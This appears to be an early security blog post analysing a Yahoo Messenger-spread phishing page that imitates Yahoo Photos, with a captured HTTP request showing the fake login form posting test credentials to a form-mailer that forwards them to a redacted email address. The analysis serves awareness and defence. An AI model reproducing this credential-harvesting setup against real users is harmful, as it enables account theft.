Just after I finished reading a story of a hacker who hacked a lot of .gov.ph sites, my previous shiftmate popped me a message on a Yahoo Messenger. He asked me if we got new IM Worm samples that uses Yahoo Messenger. I told him none, not even a sample from SOBER.AG anniv links, then he immediately popped me the link http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/. He told me that his friend popped him that link. Below is the snapshot of their correspondence in YM:
And below is the screenshot of the Yahoo Phishing site:
Here we are again, reminding Internet users to be cautious on the links that are visiting. As we can see on the image, the site is pretending to be a Yahoo Photo site, but the URL says it is a Geocities link. Always think twice before giving out any username and passwords on a website.
I sniffed the packet, to find out where the Yahoo account credentials will be sent to:
POST /form/mailto.cgi HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-
powerpoint, application/msword, */*
Referer: http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/?20068
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www2.<BLOCKED>.net
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache
Mail_From=Yahoo&Mail_To=<BLOCKED>.@yahoo.com&Mail_Subject=Yahoo+id&
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=
qwerty&passwd=asdf&.save=Sign+InHTTP/1.1 302 Found
Date: Sun, 08 Jan 2006 00:43:46 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://photos.yahoo.com/ph//my_photos
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
As we can see, the Yahoo credentials is being sent to
<BLOCKED>.@yahoo.com